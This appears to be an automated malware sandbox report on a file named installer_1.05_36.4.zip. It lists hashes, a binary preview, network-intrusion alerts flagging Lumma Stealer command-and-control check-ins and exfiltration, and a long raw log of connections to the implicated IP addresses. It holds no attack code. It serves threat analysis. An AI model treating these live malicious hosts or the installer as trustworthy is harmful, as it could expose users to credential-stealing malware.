                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..qn.."n.."n.."...#l.."g.."e.."n.."B.."<..#c.."<..#~.."<..#q.."<..#o.."<.g"o.."<..#o.."Richn.."................PE..d....(.`.........." .........`......p.....................................................`A.........................................B..4....J...............p..X....X...#..........h,..T............................,..8............................................text............................... ..`.rdata...@.......B..................@..@.data...@....`.......@..............@....pdata..X....p.......D..............@..@_RDATA...............P..............@..@.rsrc................R..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................
                                                                                                                                                                              File type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                              Entropy (8bit):7.999973803757132
                                                                                                                                                                              TrID:
                                                                                                                                                                              • ZIP compressed archive (8000/1) 100.00%
                                                                                                                                                                              File name:installer_1.05_36.4.zip
                                                                                                                                                                              File size:18'790'457 bytes
                                                                                                                                                                              MD5:fa2d5db52457d89d27b5d216bca32d78
                                                                                                                                                                              SHA1:a34f683167ad199013782d71e3071469e47e484b
                                                                                                                                                                              SHA256:9e8632f63da4af51c0b1754a0dd605df455e46aa099da11616e74938c39cdad5
                                                                                                                                                                              SHA512:3d0206d82528eb29c1171a869921863f88b20c26b72a78d61257943e76dc7e91b17adaaca9c14bdf92351b3531d562cef5ba93a1f272282c35bf479daa570946
                                                                                                                                                                              SSDEEP:393216:dVuSkk5tGLE+jM/C4HbWbD4zgiQutmx6YDjN1fxRR:dXN+AK47kD0IsQvPxn
                                                                                                                                                                              TLSH:C01733D5F5F3BE9E192D9A00FAA29080687BDCFB15C1B1D05DA53E222AD25529F9CCC0
                                                                                                                                                                              File Content Preview:PK........mg.Yj....E...E......installer_1.05_36.4.rarRar!......\E!.....-..&3`R'HH..2..DV..^aF.\.y.g>6..twLM.s.@UG..n.<.J.IrC....r.g..=.s.].&.......n.].s]..ZQ.'.S......L..M.D..7,.#...dQp..:b....K.Z...Ph........lV..`.I.f.q}........B...WCD|q/z.....l...0.a...
                                                                                                                                                                              Icon Hash:1c1c1e4e4ececedc
                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                              2024-12-26T18:26:15.238752+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1649708172.67.166.49443TCP
                                                                                                                                                                              2024-12-26T18:26:16.259072+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.1649708172.67.166.49443TCP
                                                                                                                                                                              2024-12-26T18:26:16.259072+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1649708172.67.166.49443TCP
                                                                                                                                                                              2024-12-26T18:26:17.574360+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1649709172.67.166.49443TCP
                                                                                                                                                                              2024-12-26T18:26:18.350202+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.1649709172.67.166.49443TCP
                                                                                                                                                                              2024-12-26T18:26:18.350202+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1649709172.67.166.49443TCP
                                                                                                                                                                              2024-12-26T18:26:20.168775+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1649710172.67.166.49443TCP
                                                                                                                                                                              2024-12-26T18:26:22.623747+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1649711172.67.166.49443TCP
                                                                                                                                                                              2024-12-26T18:26:25.098426+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1649712172.67.166.49443TCP
                                                                                                                                                                              2024-12-26T18:26:27.450829+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1649713172.67.166.49443TCP
                                                                                                                                                                              2024-12-26T18:26:28.215871+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.1649713172.67.166.49443TCP
                                                                                                                                                                              2024-12-26T18:26:29.931478+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1649714172.67.166.49443TCP
                                                                                                                                                                              2024-12-26T18:26:32.092068+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1649715172.67.166.49443TCP
                                                                                                                                                                              2024-12-26T18:26:34.310326+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1649716172.67.166.49443TCP
                                                                                                                                                                              2024-12-26T18:26:36.436579+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1649717172.67.166.49443TCP
                                                                                                                                                                              2024-12-26T18:26:37.202088+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1649717172.67.166.49443TCP
                                                                                                                                                                              2024-12-26T18:26:39.389022+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1649718185.161.251.21443TCP
                                                                                                                                                                              2024-12-26T18:26:41.577184+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1649719172.67.214.186443TCP
                                                                                                                                                                              2024-12-26T18:26:42.505942+01002008438ET MALWARE Possible Windows executable sent when remote host claims to send a Text File1172.67.214.186443192.168.2.1649719TCP
                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                              Dec 26, 2024 18:26:13.926237106 CET49708443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:13.926275969 CET44349708172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:13.926377058 CET49708443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:13.927520990 CET49708443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:13.927532911 CET44349708172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:15.238668919 CET44349708172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:15.238751888 CET49708443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:15.240312099 CET49708443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:15.240320921 CET44349708172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:15.240552902 CET44349708172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:15.286106110 CET49708443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:15.286123991 CET49708443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:15.286189079 CET44349708172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:16.259085894 CET44349708172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:16.259176016 CET44349708172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:16.259227037 CET49708443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:16.260075092 CET49708443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:16.260088921 CET44349708172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:16.260099888 CET49708443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:16.260104895 CET44349708172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:16.264740944 CET49709443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:16.264780998 CET44349709172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:16.264847040 CET49709443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:16.265105963 CET49709443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:16.265116930 CET44349709172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:17.574259043 CET44349709172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:17.574359894 CET49709443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:17.575531960 CET49709443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:17.575537920 CET44349709172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:17.575758934 CET44349709172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:17.576958895 CET49709443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:17.576986074 CET49709443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:17.577024937 CET44349709172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:18.350253105 CET44349709172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:18.350313902 CET44349709172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:18.350348949 CET44349709172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:18.350368977 CET49709443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:18.350380898 CET44349709172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:18.350419998 CET49709443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:18.350424051 CET44349709172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:18.353842020 CET44349709172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:18.353887081 CET49709443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:18.353892088 CET44349709172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:18.362150908 CET44349709172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:18.362199068 CET49709443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:18.362204075 CET44349709172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:18.405615091 CET49709443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:18.405622005 CET44349709172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:18.452599049 CET49709443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:18.469814062 CET44349709172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:18.516602993 CET49709443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:18.516608953 CET44349709172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:18.560754061 CET44349709172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:18.560803890 CET49709443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:18.560808897 CET44349709172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:18.564371109 CET44349709172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:18.564414978 CET49709443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:18.564419985 CET44349709172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:18.571939945 CET44349709172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:18.571994066 CET49709443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:18.572057962 CET49709443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:18.572072983 CET44349709172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:18.572081089 CET49709443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:18.572091103 CET44349709172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:18.863379002 CET49710443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:18.863419056 CET44349710172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:18.863514900 CET49710443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:18.863804102 CET49710443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:18.863816023 CET44349710172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:20.168643951 CET44349710172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:20.168775082 CET49710443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:20.169984102 CET49710443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:20.169994116 CET44349710172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:20.170222044 CET44349710172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:20.171372890 CET49710443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:20.171566963 CET49710443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:20.171597004 CET44349710172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:21.111255884 CET44349710172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:21.111375093 CET44349710172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:21.111443996 CET49710443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:21.111557961 CET49710443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:21.111574888 CET44349710172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:21.317677975 CET49711443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:21.317743063 CET44349711172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:21.317847967 CET49711443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:21.318133116 CET49711443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:21.318144083 CET44349711172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:22.623627901 CET44349711172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:22.623747110 CET49711443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:22.625272036 CET49711443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:22.625281096 CET44349711172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:22.625574112 CET44349711172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:22.626835108 CET49711443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:22.626955986 CET49711443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:22.626981974 CET44349711172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:22.627060890 CET49711443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:22.667337894 CET44349711172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:23.535689116 CET44349711172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:23.535773993 CET44349711172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:23.535832882 CET49711443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:23.535970926 CET49711443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:23.535984039 CET44349711172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:23.790817976 CET49712443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:23.790855885 CET44349712172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:23.790939093 CET49712443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:23.791346073 CET49712443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:23.791358948 CET44349712172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:25.098299980 CET44349712172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:25.098426104 CET49712443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:25.099605083 CET49712443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:25.099617958 CET44349712172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:25.099852085 CET44349712172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:25.101063013 CET49712443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:25.101252079 CET49712443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:25.101296902 CET44349712172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:25.101382971 CET49712443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:25.101392031 CET44349712172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:26.071352005 CET44349712172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:26.071448088 CET44349712172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:26.071538925 CET49712443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:26.071666956 CET49712443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:26.071681976 CET44349712172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:26.139921904 CET49713443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:26.139986992 CET44349713172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:26.140081882 CET49713443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:26.140368938 CET49713443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:26.140392065 CET44349713172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:27.450691938 CET44349713172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:27.450829029 CET49713443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:27.451998949 CET49713443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:27.452023983 CET44349713172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:27.452265978 CET44349713172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:27.453640938 CET49713443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:27.453730106 CET49713443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:27.453744888 CET44349713172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:28.215903044 CET44349713172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:28.216012955 CET44349713172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:28.216079950 CET49713443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:28.216183901 CET49713443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:28.216207027 CET44349713172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:28.221041918 CET49714443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:28.221080065 CET44349714172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:28.221167088 CET49714443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:28.221451044 CET49714443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:28.221466064 CET44349714172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:29.931366920 CET44349714172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:29.931478024 CET49714443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:29.932583094 CET49714443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:29.932595968 CET44349714172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:29.932831049 CET44349714172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:29.933950901 CET49714443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:29.934102058 CET49714443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:29.934129953 CET44349714172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:30.699275017 CET44349714172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:30.699404955 CET44349714172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:30.699476004 CET49714443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:30.699588060 CET49714443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:30.699601889 CET44349714172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:30.784512043 CET49715443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:30.784636021 CET44349715172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:30.784748077 CET49715443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:30.785028934 CET49715443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:30.785064936 CET44349715172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:32.091960907 CET44349715172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:32.092067957 CET49715443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:32.093164921 CET49715443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:32.093194008 CET44349715172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:32.093430042 CET44349715172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:32.094562054 CET49715443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:32.094691038 CET49715443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:32.094702959 CET44349715172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:32.899319887 CET44349715172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:32.899431944 CET44349715172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:32.899523020 CET49715443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:32.899677038 CET49715443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:32.899724960 CET44349715172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:33.005239964 CET49716443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:33.005287886 CET44349716172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:33.005373955 CET49716443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:33.005645990 CET49716443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:33.005656004 CET44349716172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:34.310219049 CET44349716172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:34.310326099 CET49716443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:34.311475039 CET49716443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:34.311480999 CET44349716172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:34.311675072 CET44349716172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:34.312777996 CET49716443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:34.312882900 CET49716443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:34.312887907 CET44349716172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:35.124763012 CET44349716172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:35.124856949 CET44349716172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:35.124959946 CET49716443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:35.125073910 CET49716443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:35.125087023 CET44349716172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:35.127986908 CET49717443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:35.128026962 CET44349717172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:35.128118992 CET49717443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:35.128386021 CET49717443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:35.128396034 CET44349717172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:36.436474085 CET44349717172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:36.436578989 CET49717443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:36.437693119 CET49717443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:36.437701941 CET44349717172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:36.437912941 CET44349717172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:36.439414978 CET49717443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:36.439459085 CET49717443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:36.439480066 CET44349717172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:37.202097893 CET44349717172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:37.202195883 CET44349717172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:37.202264071 CET49717443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:37.202461958 CET49717443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:37.202477932 CET44349717172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:37.202488899 CET49717443192.168.2.16172.67.166.49
                                                                                                                                                                              Dec 26, 2024 18:26:37.202493906 CET44349717172.67.166.49192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:37.696655989 CET49718443192.168.2.16185.161.251.21
                                                                                                                                                                              Dec 26, 2024 18:26:37.696695089 CET44349718185.161.251.21192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:37.696768999 CET49718443192.168.2.16185.161.251.21
                                                                                                                                                                              Dec 26, 2024 18:26:37.697076082 CET49718443192.168.2.16185.161.251.21
                                                                                                                                                                              Dec 26, 2024 18:26:37.697086096 CET44349718185.161.251.21192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:39.388928890 CET44349718185.161.251.21192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:39.389022112 CET49718443192.168.2.16185.161.251.21
                                                                                                                                                                              Dec 26, 2024 18:26:39.390609026 CET49718443192.168.2.16185.161.251.21
                                                                                                                                                                              Dec 26, 2024 18:26:39.390614986 CET44349718185.161.251.21192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:39.390835047 CET44349718185.161.251.21192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:39.392322063 CET49718443192.168.2.16185.161.251.21
                                                                                                                                                                              Dec 26, 2024 18:26:39.439331055 CET44349718185.161.251.21192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:39.921199083 CET44349718185.161.251.21192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:39.921274900 CET44349718185.161.251.21192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:39.921333075 CET49718443192.168.2.16185.161.251.21
                                                                                                                                                                              Dec 26, 2024 18:26:39.921569109 CET49718443192.168.2.16185.161.251.21
                                                                                                                                                                              Dec 26, 2024 18:26:39.921582937 CET44349718185.161.251.21192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:39.921595097 CET49718443192.168.2.16185.161.251.21
                                                                                                                                                                              Dec 26, 2024 18:26:39.921601057 CET44349718185.161.251.21192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:40.263761044 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:40.263789892 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:40.263940096 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:40.264292002 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:40.264303923 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:41.577110052 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:41.577183962 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:41.578793049 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:41.578804016 CET44349719172.67.214.186192.168.2.16
